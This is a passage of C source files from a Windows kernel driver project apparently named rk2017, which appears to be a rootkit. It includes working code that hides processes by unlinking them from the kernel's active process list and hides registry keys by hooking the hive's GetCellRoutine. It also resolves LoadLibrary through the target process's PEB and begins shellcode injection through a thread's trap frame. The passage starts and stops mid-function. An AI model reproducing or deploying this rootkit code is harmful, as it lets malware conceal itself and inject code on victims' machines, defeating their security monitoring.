(pNtHeader->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) 82 | { 83 | PIMAGE_OPTIONAL_HEADER32 pOptHeader32; 84 | 85 | pOptHeader32 = (PIMAGE_OPTIONAL_HEADER32)((ULONG)pNtHeader + sizeof(ULONG) + sizeof(IMAGE_FILE_HEADER)); 86 | pEat = (PIMAGE_EXPORT_DIRECTORY)((ULONG)pBaseAddress + pOptHeader32->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 87 | bIsWow64Bits = FALSE; 88 | } 89 | else if (pNtHeader->FileHeader.Machine == IMAGE_FILE_MACHINE_IA64 || \ 90 | pNtHeader->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) 91 | { 92 | PIMAGE_OPTIONAL_HEADER64 pOptHeader64; 93 | 94 | pOptHeader64 = (PIMAGE_OPTIONAL_HEADER64)((ULONG64)pNtHeader + sizeof(ULONG) + sizeof(IMAGE_FILE_HEADER)); 95 | pEat = (PIMAGE_EXPORT_DIRECTORY)pOptHeader64->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 96 | bIsWow64Bits = TRUE; 97 | } 98 | else 99 | { 100 | bIsWow64Bits = FALSE; 101 | } 102 | if (bIsWow64Bits == TRUE) 103 | { 104 | } 105 | else 106 | { 107 | ulNumberOfNames = pEat->NumberOfFunctions; 108 | ulAddressOfNames = (ULONG *)((ULONG)pBaseAddress + pEat->AddressOfNames); 109 | ulAddressOfFunctions = (ULONG *)((ULONG)pBaseAddress + pEat->AddressOfFunctions); 110 | ulAddressOfNameOrdinals = (USHORT *)((ULONG)pBaseAddress + pEat->AddressOfNameOrdinals); 111 | for (uli = 0;uli < ulNumberOfNames;uli++) 112 | { 113 | pTargetApiName = (PCHAR)((ULONG)pBaseAddress + ulAddressOfNames[uli]); 114 | if (_strnicmp(pTargetApiName,pFunctionName,strlen(pFunctionName)) == 0) 115 | { 116 | ulFunctionsOrdinals = (USHORT)(ulAddressOfNameOrdinals[uli] + pEat->Base - 1); 117 | pTargetApiAddress = (PCHAR)((ULONG)pBaseAddress + ulAddressOfFunctions[ulFunctionsOrdinals]); 118 | return (ULONG_PTR)pTargetApiAddress; 119 | } 120 | } 121 | } 122 | return (ULONG_PTR)NULL; 123 | } 124 | ULONG_PTR SearchApiFromPeb(PINJECT_OBJECT_INFORMATION pInjectObjInfo,PCHAR pModuleName,PCHAR pApiName) 125 | { 126 | PPEB Peb; 127 | PPEB_LDR_DATA pPebLdrDat; 128 | PLDR_MODULE pLdrModule; 129 | PLIST_ENTRY pCurListEntry; 130 | PLIST_ENTRY pHeaderListEntry; 131 | ANSI_STRING aStrModuleName; 132 | UNICODE_STRING unStrModuleName; 133 | 134 | if (NULL == pInjectObjInfo || \ 135 | NULL == pModuleName || \ 136 | NULL == pApiName) 137 | { 138 | return (ULONG_PTR)NULL; 139 | } 140 | RtlInitAnsiString(&aStrModuleName,pModuleName); 141 | RtlAnsiStringToUnicodeString(&unStrModuleName,&aStrModuleName,TRUE); 142 | Peb = (PPEB)*(ULONG_PTR*)((ULONG_PTR)pInjectObjInfo->pInjectProcess + g_InjectRelevantOffset.ulOffsetPeb); 143 | if (NULL == Peb) 144 | { 145 | RtlFreeUnicodeString(&unStrModuleName); 146 | return (ULONG_PTR)NULL; 147 | } 148 | pPebLdrDat = (PPEB_LDR_DATA)*(ULONG_PTR*)((ULONG_PTR)Peb + g_InjectRelevantOffset.ulOffsetPebLdr); 149 | if (NULL == pPebLdrDat) 150 | { 151 | RtlFreeUnicodeString(&unStrModuleName); 152 | return (ULONG_PTR)NULL; 153 | } 154 | pHeaderListEntry = pCurListEntry = pPebLdrDat->InLoadOrderModuleList.Flink; 155 | while (pHeaderListEntry != pCurListEntry->Flink) 156 | { 157 | pLdrModule = (PLDR_MODULE)pCurListEntry; 158 | if (NULL == pLdrModule) 159 | { 160 | continue; 161 | } 162 | if (RtlCompareUnicodeString(&pLdrModule->BaseDllName,&unStrModuleName,TRUE) == 0) 163 | { 164 | g_InjectAplList.ulx86LoadLibrary = GetExportFunction(pLdrModule->BaseAddress,pApiName); 165 | RtlFreeUnicodeString(&unStrModuleName); 166 | return g_InjectAplList.ulx86LoadLibrary; 167 | } 168 | pCurListEntry = pCurListEntry->Flink; 169 | } 170 | RtlFreeUnicodeString(&unStrModuleName); 171 | return (ULONG_PTR)NULL; 172 | } 173 | ULONG_PTR GetDllFunctionAddress(PCHAR pFunctionName,PUNICODE_STRING pDllName) 174 | { 175 | NTSTATUS Status; 176 | USHORT uMachine; 177 | HANDLE hSection,hFile; 178 | OBJECT_ATTRIBUTES ObjectAttributes; 179 | PIMAGE_DOS_HEADER pDosHeader; 180 | PIMAGE_EXPORT_DIRECTORY pEat; 181 | IO_STATUS_BLOCK IoStatusBlock; 182 | ULONG* ulAddressOfFunctions; 183 | ULONG* ulAddressOfNames; 184 | SHORT* AddressOfNameOrdinals; 185 | ULONG ulFunctionOrdinal; 186 | ULONG uli,FunctionAddress; 187 | PCHAR FunctionName; 188 | STRING ntFunctionName,ntFunctionNameSearch; 189 | PVOID pBaseAddress; 190 | SIZE_T Size; 191 | 192 | Size = 0; 193 | pBaseAddress = NULL; 194 | InitializeObjectAttributes(&ObjectAttributes,pDllName,OBJ_CASE_INSENSITIVE,NULL,0); 195 | 196 | Status = ZwOpenFile(&hFile, \ 197 | FILE_EXECUTE | SYNCHRONIZE, \ 198 | &ObjectAttributes, \ 199 | &IoStatusBlock, \ 200 | FILE_SHARE_READ, \ 201 | FILE_SYNCHRONOUS_IO_NONALERT); 202 | if (NT_ERROR(Status)) 203 | { 204 | return Status; 205 | } 206 | Status = ZwCreateSection(&hSection, \ 207 | SECTION_MAP_READ, \ 208 | NULL/*&ObjectAttributes*/, \ 209 | NULL, \ 210 | PAGE_READONLY, \ 211 | SEC_IMAGE, \ 212 | hFile); 213 | if (NT_ERROR(Status)) 214 | { 215 | ZwClose(hFile); 216 | return Status; 217 | } 218 | Status = ZwMapViewOfSection(hSection, \ 219 | NtCurrentProcess(), \ 220 | &pBaseAddress, \ 221 | 0, \ 222 | 0, \ 223 | 0, \ 224 | &Size, \ 225 | ViewShare, \ 226 | 0, \ 227 | PAGE_READONLY); 228 | if (NT_ERROR(Status)) 229 | { 230 | if (Status == STATUS_IMAGE_NOT_AT_BASE && \ 231 | Size > 0) 232 | { 233 | 234 | } 235 | else 236 | { 237 | ZwClose(hFile); 238 | return Status; 239 | } 240 | } 241 | ZwClose(hFile); 242 | pDosHeader = (PIMAGE_DOS_HEADER)pBaseAddress; 243 | uMachine = ((PIMAGE_NT_HEADERS)((PCHAR)pDosHeader + pDosHeader->e_lfanew))->FileHeader.Machine; 244 | if (IMAGE_FILE_MACHINE_AMD64 == uMachine || \ 245 | IMAGE_FILE_MACHINE_IA64 == uMachine) 246 | { 247 | PIMAGE_NT_HEADERS64 pNtHeaders64; 248 | 249 | pNtHeaders64 = (PIMAGE_NT_HEADERS64)((PCHAR)pDosHeader + pDosHeader->e_lfanew); 250 | pEat = (PIMAGE_EXPORT_DIRECTORY)((PCHAR)pBaseAddress + \ 251 | pNtHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 252 | } 253 | else 254 | { 255 | PIMAGE_NT_HEADERS32 pNtHeaders32; 256 | 257 | pNtHeaders32 = (PIMAGE_NT_HEADERS32)((PCHAR)pDosHeader + pDosHeader->e_lfanew); 258 | pEat = (PIMAGE_EXPORT_DIRECTORY)((PCHAR)pBaseAddress + \ 259 | pNtHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 260 | DbgPrint("%p",pEat); 261 | } 262 | ulAddressOfFunctions = (ULONG *)((PCHAR)pBaseAddress + pEat->AddressOfFunctions); 263 | ulAddressOfNames = (ULONG *)((PCHAR)pBaseAddress + pEat->AddressOfNames); 264 | AddressOfNameOrdinals = (SHORT*)pEat->AddressOfNameOrdinals; 265 | 266 | RtlInitString(&ntFunctionNameSearch,pFunctionName); 267 | 268 | for(uli = 0;uli < pEat->NumberOfFunctions;uli++) 269 | { 270 | FunctionName = (PCHAR)((PCHAR)pBaseAddress + ulAddressOfNames[uli]); 271 | RtlInitString(&ntFunctionName,FunctionName); 272 | ulFunctionOrdinal = AddressOfNameOrdinals[uli] + pEat->Base - 1; 273 | FunctionAddress = (ULONG)((PCHAR)pBaseAddress + ulAddressOfFunctions[ulFunctionOrdinal]); 274 | if (RtlCompareString(&ntFunctionName,&ntFunctionNameSearch,TRUE) == 0) 275 | { 276 | ZwClose(hSection); 277 | return FunctionAddress; 278 | } 279 | } 280 | ZwClose(hSection); 281 | Status = STATUS_UNSUCCESSFUL; 282 | return Status; 283 | } -------------------------------------------------------------------------------- /rk/GetProcAddr.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/GetProcAddr.h -------------------------------------------------------------------------------- /rk/HideProcess.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "DefSystemVar.h" 3 | #include "ToolFnc.h" 4 | #include "InitializeInjectRelevantInfo.h" 5 | #include "HideProcess.h" 6 | 7 | LIST_ENTRY g_HidePrcoessListInfo; 8 | 9 | void InitializeHideProcessList() 10 | { 11 | InitializeListHead(&g_HidePrcoessListInfo); 12 | } 13 | ULONG GetProcessId(PCHAR pProcName) 14 | { 15 | NTSTATUS Status; 16 | ULONG ulNeedSize; 17 | PVOID pProcInfo; 18 | PWCHAR pProcessNameW; 19 | //CHAR ProcessName[MAX_PATH]; 20 | PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation; 21 | PSYSTEM_THREAD_INFORMATION pSystemThreadInformation; 22 | UNICODE_STRING UniProcessName; 23 | ANSI_STRING AnsiProcessName; 24 | 25 | ulNeedSize = 0; 26 | pProcInfo = NULL; 27 | pSystemProcessInformation = NULL; 28 | pSystemThreadInformation = NULL; 29 | //RtlZeroMemory(ProcessName,MAX_PATH); 30 | 31 | Status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation,&ulNeedSize,0,&ulNeedSize); 32 | if (Status == STATUS_INFO_LENGTH_MISMATCH) 33 | { 34 | pProcInfo = ExAllocatePool(NonPagedPool,ulNeedSize); 35 | if (pProcInfo == NULL) 36 | { 37 | return 0; 38 | } 39 | RtlZeroMemory(pProcInfo,ulNeedSize); 40 | } 41 | Status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation,pProcInfo,ulNeedSize,NULL); 42 | if (NT_ERROR(Status)) 43 | { 44 | if (pProcInfo) 45 | { 46 | ExFreePool(pProcInfo); 47 | pProcInfo = NULL; 48 | } 49 | return 0; 50 | } 51 | pSystemProcessInformation = (PSYSTEM_PROCESS_INFORMATION)pProcInfo; 52 | 53 | while(TRUE) 54 | { 55 | pProcessNameW = pSystemProcessInformation->ProcessName.Buffer; 56 | if (pProcessNameW == NULL) 57 | { 58 | pProcessNameW = L"NULL"; 59 | pSystemProcessInformation = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pSystemProcessInformation + \ 60 | pSystemProcessInformation->NextEntryDelta); 61 | continue; 62 | } 63 | if (RtlCreateUnicodeString(&UniProcessName,pProcessNameW) == TRUE) 64 | { 65 | RtlUnicodeStringToAnsiString(&AnsiProcessName,&UniProcessName,TRUE); 66 | if(_strnicmp(AnsiProcessName.Buffer,pProcName,strlen(pProcName)) == 0) 67 | { 68 | DbgPrint("ProcessId is %d %x\n",pSystemProcessInformation->ProcessId,pSystemProcessInformation->ProcessId); 69 | if (UniProcessName.Buffer && UniProcessName.Length) 70 | { 71 | RtlFreeUnicodeString(&UniProcessName); 72 | } 73 | RtlFreeAnsiString(&AnsiProcessName); 74 | return pSystemProcessInformation->ProcessId; 75 | } 76 | if (UniProcessName.Buffer && UniProcessName.Length) 77 | { 78 | RtlFreeUnicodeString(&UniProcessName); 79 | } 80 | RtlFreeAnsiString(&AnsiProcessName); 81 | if (pSystemProcessInformation->NextEntryDelta == 0) 82 | { 83 | break; 84 | } 85 | pSystemProcessInformation = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pSystemProcessInformation + \ 86 | pSystemProcessInformation->NextEntryDelta); 87 | } 88 | } 89 | if (pProcInfo) 90 | { 91 | ExFreePool(pProcInfo); 92 | pProcInfo = NULL; 93 | } 94 | return 0; 95 | } 96 | NTSTATUS HideProcess(ULONG ulHideProcessId) 97 | { 98 | NTSTATUS Status; 99 | PLIST_ENTRY pListActiveProcs; 100 | PVOID pEProcess; 101 | PHIDE_PROCESS_LIST_INFO pHideProcessListInfo; 102 | 103 | Status = STATUS_UNSUCCESSFUL; 104 | 105 | if (ulHideProcessId == 0 || \ 106 | ulHideProcessId == 0x04 || \ 107 | ulHideProcessId == 0x08) 108 | { 109 | Status = STATUS_INVALID_PARAMETER; 110 | return Status; 111 | } 112 | 113 | pListActiveProcs = NULL; 114 | pEProcess = NULL; 115 | pHideProcessListInfo = NULL; 116 | 117 | Status = PsLookupProcessByProcessId((HANDLE)ulHideProcessId,(PEPROCESS *)&pEProcess); 118 | if (NT_ERROR(Status)) 119 | { 120 | return Status; 121 | } 122 | pListActiveProcs = (PLIST_ENTRY)((ULONG_PTR)pEProcess + g_InjectRelevantOffset.ulOffsetFlink); 123 | if (NULL == pListActiveProcs || MmIsAddressValid(pEProcess) == FALSE) 124 | { 125 | ObDereferenceObject(pEProcess); 126 | Status = STATUS_INVALID_ADDRESS; 127 | return Status; 128 | } 129 | pHideProcessListInfo = ExAllocatePool(NonPagedPool,sizeof(HIDE_PROCESS_LIST_INFO)); 130 | if (NULL == pHideProcessListInfo) 131 | { 132 | ObDereferenceObject(pEProcess); 133 | Status = STATUS_MEMORY_NOT_ALLOCATED; 134 | return Status; 135 | } 136 | RtlZeroMemory(pHideProcessListInfo,sizeof(HIDE_PROCESS_LIST_INFO)); 137 | 138 | pHideProcessListInfo->pHideProcessListEntry = pListActiveProcs; 139 | pHideProcessListInfo->ulProcessId = ulHideProcessId; 140 | InitializeListHead(&pHideProcessListInfo->NextList); 141 | InsertTailList(&g_HidePrcoessListInfo,&pHideProcessListInfo->NextList); 142 | 143 | pListActiveProcs->Blink->Flink = pListActiveProcs->Flink; 144 | pListActiveProcs->Flink->Blink= pListActiveProcs->Blink; 145 | 146 | ObDereferenceObject(pEProcess); 147 | Status = STATUS_SUCCESS; 148 | return Status; 149 | } -------------------------------------------------------------------------------- /rk/HideProcess.h: -------------------------------------------------------------------------------- 1 | #ifndef __HIDE_PROCESS_H__ 2 | #define __HIDE_PROCESS_H__ 3 | 4 | typedef struct _HIDE_PROCESS_LIST_INFO 5 | { 6 | LIST_ENTRY NextList; 7 | ULONG ulProcessId; 8 | PLIST_ENTRY pHideProcessListEntry; 9 | } HIDE_PROCESS_LIST_INFO,*PHIDE_PROCESS_LIST_INFO; 10 | 11 | void InitializeHideProcessList(); 12 | ULONG GetProcessId(PCHAR pProcName); 13 | NTSTATUS HideProcess(ULONG ulHideProcessId); 14 | 15 | extern LIST_ENTRY g_HidePrcoessListInfo; 16 | #endif -------------------------------------------------------------------------------- /rk/HideReg.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "InitializeInjectRelevantInfo.h" 3 | #include "HideReg.h" 4 | 5 | LIST_ENTRY g_HideKeyList; 6 | KSPIN_LOCK g_SpinLockHideKeyList; 7 | 8 | void InitializeHideKeyList() 9 | { 10 | InitializeListHead(&g_HideKeyList); 11 | KeInitializeSpinLock(&g_SpinLockHideKeyList); 12 | } 13 | HANDLE OpenKeyByName(PWCHAR pKeyNameW) 14 | { 15 | NTSTATUS Status; 16 | UNICODE_STRING UniKeyName; 17 | OBJECT_ATTRIBUTES ObjectAttributes; 18 | HANDLE hKey; 19 | RtlInitUnicodeString(&UniKeyName,pKeyNameW); 20 | InitializeObjectAttributes(&ObjectAttributes,&UniKeyName,OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,NULL,NULL); 21 | Status = ZwOpenKey(&hKey,KEY_READ,&ObjectAttributes); 22 | if(!NT_SUCCESS(Status)) 23 | { 24 | return NULL; 25 | } 26 | return hKey; 27 | } 28 | PVOID GetKeyControlBlock(HANDLE hKey) 29 | { 30 | NTSTATUS Status; 31 | PCM_KEY_BODY pKeyBody; 32 | PVOID pCmKeyCtlBlock; 33 | 34 | if(hKey == NULL) 35 | { 36 | return NULL; 37 | } 38 | pCmKeyCtlBlock = NULL; 39 | pKeyBody = NULL; 40 | Status = STATUS_SUCCESS; 41 | 42 | Status = ObReferenceObjectByHandle(hKey,KEY_READ,NULL,KernelMode,&pKeyBody,NULL); 43 | if(NT_ERROR(Status)) 44 | { 45 | return NULL; 46 | } 47 | pCmKeyCtlBlock = (PVOID)pKeyBody->KeyControlBlock; 48 | ObDereferenceObject(pKeyBody); 49 | return pCmKeyCtlBlock; 50 | } 51 | 52 | 53 | PVOID GetLastKeyNode(PVOID pHive,PCM_KEY_NODE pNode,PGET_CELL_ROUTINE pGetCellRoutine) 54 | { 55 | // get parent Node 56 | PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)pGetCellRoutine(pHive,pNode->Parent); 57 | 58 | PCM_KEY_INDEX Index = (PCM_KEY_INDEX)pGetCellRoutine(pHive,ParentNode->SubKeyLists[0]); 59 | 60 | //DbgPrint("ParentNode = 0x%x, IndexList = 0x%x\n", ParentNode,Index); 61 | //DbgPrint("ParentNode->SubKeyCounts[0] : %d, ParentNode->SubKeyCounts[1] : \ 62 | //%d\n",ParentNode->SubKeyCounts[0],ParentNode->SubKeyCounts[1]); 63 | //DbgPrint("Signature : 0x%x, Index->Count : %d\n",(USHORT)Index->Signature,Index->Count); 64 | 65 | if(Index->Signature == CM_KEY_INDEX_ROOT) 66 | { 67 | Index = (PCM_KEY_INDEX)pGetCellRoutine(pHive,Index->List[Index->Count - 1]); 68 | } 69 | 70 | if(Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF) 71 | { 72 | return pGetCellRoutine(pHive,Index->List[2 * (Index->Count - 1)]); 73 | } 74 | else 75 | { 76 | return pGetCellRoutine(pHive,Index->List[ Index->Count - 1 ]); 77 | } 78 | } 79 | 80 | 81 | PVOID MyGetCellRoutine(PVOID pHive,HANDLE Cell) 82 | { 83 | PVOID pRetValue; 84 | PLIST_ENTRY pCurEntry; 85 | PHIDE_KEY_LIST pHideKeyList; 86 | 87 | pCurEntry = NULL; 88 | pRetValue = NULL; 89 | pHideKeyList = NULL; 90 | 91 | if (!IsListEmpty(&g_HideKeyList)) 92 | { 93 | for (pCurEntry = g_HideKeyList.Flink;pCurEntry != &g_HideKeyList;pCurEntry = pCurEntry->Flink) 94 | { 95 | pHideKeyList = CONTAINING_RECORD(pCurEntry,HIDE_KEY_LIST,NextHideKey); 96 | if (pHideKeyList->pHive == pHive) 97 | { 98 | break; 99 | } 100 | } 101 | } 102 | pRetValue = pHideKeyList->pGetCellRoutine(pHive,Cell); 103 | if(pRetValue) 104 | { 105 | //if pGetCellRoutine return the node to hide 106 | if(pRetValue == pHideKeyList->pHideNode) 107 | { 108 | //get last KeyNode and save it in LastNode 109 | pRetValue = pHideKeyList->pLastNode = (PCM_KEY_NODE)GetLastKeyNode(pHive, \ 110 | pHideKeyList->pHideNode, \ 111 | pHideKeyList->pGetCellRoutine); 112 | //if our HideNode=LastNode, return NULL 113 | if(pRetValue == pHideKeyList->pHideNode) 114 | { 115 | pRetValue = NULL; 116 | } 117 | } 118 | //after, when we reach the LastNode we return NULL 119 | else if(pRetValue == pHideKeyList->pLastNode) 120 | { 121 | pRetValue = pHideKeyList->pLastNode = NULL; 122 | } 123 | } 124 | return pRetValue; 125 | } 126 | NTSTATUS CmHideKey(PWCHAR pHideKeyPathW) 127 | { 128 | HANDLE hHideKey; 129 | PVOID pCmKeyCtlBlock; 130 | PHHIVE pHive; 131 | NTSTATUS Status; 132 | PHIDE_KEY_LIST pHideKeyList; 133 | PGET_CELL_ROUTINE pGetCellRoutine; 134 | PGET_CELL_ROUTINE *ppGetCellRoutine; 135 | KIRQL Irql; 136 | 137 | PCM_KEY_NODE pHideNode = NULL; 138 | 139 | hHideKey = NULL; 140 | pCmKeyCtlBlock = NULL; 141 | pHive = NULL; 142 | Status = STATUS_UNSUCCESSFUL; 143 | pHideKeyList = NULL; 144 | pGetCellRoutine = NULL; 145 | ppGetCellRoutine = NULL; 146 | pHideNode = NULL; 147 | //get a handle witch reference a KEY_BOY struct 148 | hHideKey = OpenKeyByName(pHideKeyPathW); 149 | if (NULL == hHideKey) 150 | { 151 | return Status; 152 | } 153 | //get KEY_CONTROL_KEY associated with the key mapping 154 | pCmKeyCtlBlock = (PVOID)GetKeyControlBlock(hHideKey); 155 | if (pCmKeyCtlBlock == NULL) 156 | { 157 | return Status; 158 | } 159 | if(pCmKeyCtlBlock) 160 | { 161 | pHive = (PHHIVE)*(PULONG)((ULONG)pCmKeyCtlBlock + \ 162 | g_InjectRelevantOffset.CmKeyOffset.ulOffsetKeyHive); 163 | if (MmIsAddressValid(pHive)) 164 | { 165 | //save address of GetCellRoutine variable in hive struct 166 | ppGetCellRoutine = &pHive->GetCellRoutine; 167 | //save GetCellRoutine function address 168 | pGetCellRoutine = pHive->GetCellRoutine; 169 | 170 | if (MmIsAddressValid(pGetCellRoutine)) 171 | { 172 | do 173 | { 174 | pHideKeyList = ExAllocatePool(NonPagedPool,sizeof(HIDE_KEY_LIST)); 175 | } while (NULL == pHideKeyList); 176 | RtlZeroMemory(pHideKeyList,sizeof(HIDE_KEY_LIST)); 177 | InitializeListHead(&pHideKeyList->NextHideKey); 178 | RtlCopyMemory(pHideKeyList->HideKeyNameW,pHideKeyPathW,wcslen(pHideKeyPathW) * sizeof(WCHAR)); 179 | pHideKeyList->pGetCellRoutine = pGetCellRoutine; 180 | pHideKeyList->ppGetCellRoutine = ppGetCellRoutine; 181 | pHideKeyList->pHive = pHive; 182 | 183 | //get the KeyNode to hide 184 | pHideNode = (PCM_KEY_NODE)pGetCellRoutine(pHive, \ 185 | (HANDLE)*(PULONG)((ULONG)pCmKeyCtlBlock + g_InjectRelevantOffset.CmKeyOffset.ulOffsetKeyCell)); 186 | pHideKeyList->pHideNode = pHideNode; 187 | 188 | KeAcquireSpinLock(&g_SpinLockHideKeyList,&Irql); 189 | InsertTailList(&g_HideKeyList,&pHideKeyList->NextHideKey); 190 | KeReleaseSpinLock(&g_SpinLockHideKeyList,Irql); 191 | //replace GetCellRoutine by MyGetCellRoutine 192 | pHive->GetCellRoutine = MyGetCellRoutine; 193 | Status = STATUS_SUCCESS; 194 | } 195 | } 196 | } 197 | ZwClose(hHideKey); 198 | return Status; 199 | } -------------------------------------------------------------------------------- /rk/HideReg.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/HideReg.h -------------------------------------------------------------------------------- /rk/InitializeInjectRelevantInfo.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/InitializeInjectRelevantInfo.c -------------------------------------------------------------------------------- /rk/InitializeInjectRelevantInfo.h: -------------------------------------------------------------------------------- 1 | #ifndef ITIALIZE_INJECT_RELEVANT_INFO__ 2 | #define ITIALIZE_INJECT_RELEVANT_INFO__ 3 | 4 | typedef struct _RK_SYSTEM_VERSION 5 | { 6 | ULONG ulMajorVersion; 7 | ULONG ulMinorVersion; 8 | ULONG ulBuildNumber; 9 | PUNICODE_STRING unStrCSDVersion; 10 | }RK_SYSTEM_VERSION,*PRK_SYSTEM_VERSION; 11 | 12 | typedef struct _CM_KEY_OFFSET 13 | { 14 | ULONG ulOffsetKeyHive; 15 | ULONG ulOffsetKeyCell; 16 | ULONG ulOffsetCellRoutine; 17 | }CM_KEY_OFFSET,*PCM_KEY_OFFSET; 18 | 19 | typedef struct _STORE_PROCESS_INFORMATION 20 | { 21 | HANDLE hProcessId; 22 | }STORE_PROCESS_INFORMATION,*PSTORE_PROCESS_INFORMATION; 23 | 24 | typedef struct _WINDOWS_VERSION 25 | { 26 | #ifndef _WIN64 27 | ULONG_PTR ulReserved:20; 28 | #else 29 | ULONG_PTR ulReserved:52; 30 | #endif 31 | ULONG_PTR bIsUnknow:1; 32 | ULONG_PTR bIsWindows2000:1; 33 | ULONG_PTR bIsWindowsXp:1; 34 | ULONG_PTR bIsWindows2003:1; 35 | ULONG_PTR bIsWindowsVista:1; 36 | ULONG_PTR bIsWindows7:1; 37 | ULONG_PTR bIsWindows2008:1; 38 | ULONG_PTR bIsWindows8:1; 39 | ULONG_PTR bIsWindows81:1; 40 | ULONG_PTR bIsWindows10:1; 41 | ULONG_PTR bIsWindows2012:1; 42 | ULONG_PTR bIs64Bit:1; 43 | }WINDOWS_VERSION,*PWINDOWS_VERSION; 44 | 45 | typedef struct _INJECT_RELEVANT_OFFSET 46 | { 47 | //Process 48 | ULONG_PTR ulOffsetPeb; 49 | ULONG_PTR ulOffsetName; 50 | ULONG_PTR ulOffsetFlink; 51 | ULONG_PTR ulOffsetResv; 52 | ULONG_PTR ulOffsetThreadListHead; 53 | ULONG_PTR ulOffsetPid; 54 | 55 | //Thread 56 | ULONG_PTR ulOffsetThreadListEntry; 57 | ULONG_PTR ulOffsetSuspendCount; 58 | ULONG_PTR ulOffsetCrossThreadFlags; 59 | ULONG_PTR ulOffsetCid; 60 | ULONG_PTR ulOffsetTrapFrame; 61 | ULONG_PTR ulOffsetTeb; 62 | 63 | //PEB 64 | ULONG_PTR ulOffsetPebLdr; 65 | ULONG_PTR ulOffsetPebModuleListEntry; 66 | 67 | //Teb 68 | ULONG_PTR ulOffsetActivationContextStackPointer; 69 | 70 | WINDOWS_VERSION WindowsVersion; 71 | 72 | STORE_PROCESS_INFORMATION StoreProcessExplorer; 73 | 74 | CM_KEY_OFFSET CmKeyOffset; 75 | 76 | PSPTERMINATETHREADBYPOINTER PspTerminateThreadByPointer; 77 | //PVOID PspTerminateThreadByPointer; 78 | }INJECT_RELEVANT_OFFSET,*PINJECT_RELEVANT_OFFSET; 79 | #define NT_SYSTEM_NAME "System" 80 | 81 | 82 | 83 | extern INJECT_RELEVANT_OFFSET g_InjectRelevantOffset; 84 | 85 | ULONG GetProcessNameOffset(); 86 | NTSTATUS IsWindows64Bits(PVOID pCurProcess); 87 | BOOLEAN InitializeWindows2k(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 88 | BOOLEAN InitializeWindowsXp(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 89 | BOOLEAN InitializeWindows2003(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 90 | NTSTATUS InitializeWindows7(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 91 | NTSTATUS InitializeWindows8(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 92 | NTSTATUS InitializeWindows8_1(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 93 | NTSTATUS InitializeWindows10(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 94 | BOOLEAN InitializeInjectInformation(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset); 95 | 96 | #endif 97 | -------------------------------------------------------------------------------- /rk/InjectInitialize.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/InjectInitialize.c -------------------------------------------------------------------------------- /rk/InjectInitialize.h: -------------------------------------------------------------------------------- 1 | 2 | BOOLEAN InitializeInjectApiList(PINJECT_OBJECT_INFORMATION pInjectObjInfo,PINJECT_API_LIST pInjectApiList); 3 | BOOLEAN InitializeInjectDllPath(PINJECT_OBJECT_INFORMATION pInjectObjInfo,CHAR *InjectDllPath); -------------------------------------------------------------------------------- /rk/InjectKtrapFrame.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "DefSystemVar.h" 3 | #include "InjectShellCode.h" 4 | #include "InitializeInjectRelevantInfo.h" 5 | #include "InjectKtrapFrame.h" 6 | #include "InjectInitialize.h" 7 | 8 | INJECT_API_LIST g_InjectAplList; 9 | BOOLEAN g_bIsInjectKtrapFrame = FALSE; 10 | 11 | NTSTATUS InjectApcRoutine(PINJECT_OBJECT_INFORMATION pInjectObjInfo,PCHAR pShellCode,ULONG ulSize) 12 | { 13 | NTSTATUS Status; 14 | KAPC_STATE ApcState; 15 | 16 | if (NULL == pInjectObjInfo) 17 | { 18 | return STATUS_INVALID_PARAMETER_1; 19 | } 20 | 21 | Status = STATUS_UNSUCCESSFUL; 22 | KeStackAttachProcess(pInjectObjInfo->pInjectProcess,&ApcState); 23 | 24 | 25 | KeUnstackDetachProcess(&ApcState); 26 | return Status; 27 | } 28 | NTSTATUS x86ShellCodeInject(PINJECT_OBJECT_INFORMATION pInjectObjInfo,PCHAR pShellCode,ULONG ulSize) 29 | { 30 | NTSTATUS Status; 31 | PINJECT_X86_KTRAP_FRAME pKtrapFrame; 32 | PCHAR pCharShellCode; 33 | ULONG uli; 34 | HANDLE hInjectProcess; 35 | PVOID pBaseAddress,pTmpPath; 36 | KAPC_STATE ApcState; 37 | ULONG_PTR ulRetSize; 38 | // PCLIENT_ID pClientId; 39 | // OBJECT_ATTRIBUTES ObjectAttributes; 40 | // ULONG ulOldProtect; 41 | 42 | 43 | pCharShellCode = NULL; 44 | pBaseAddress = NULL; 45 | pTmpPath = NULL; 46 | 47 | __try 48 | { 49 | g_InjectAplList.StdCallKeSuspendThread(pInjectObjInfo->pInjectThread,NULL); 50 | } 51 | __except(1) 52 | { 53 | 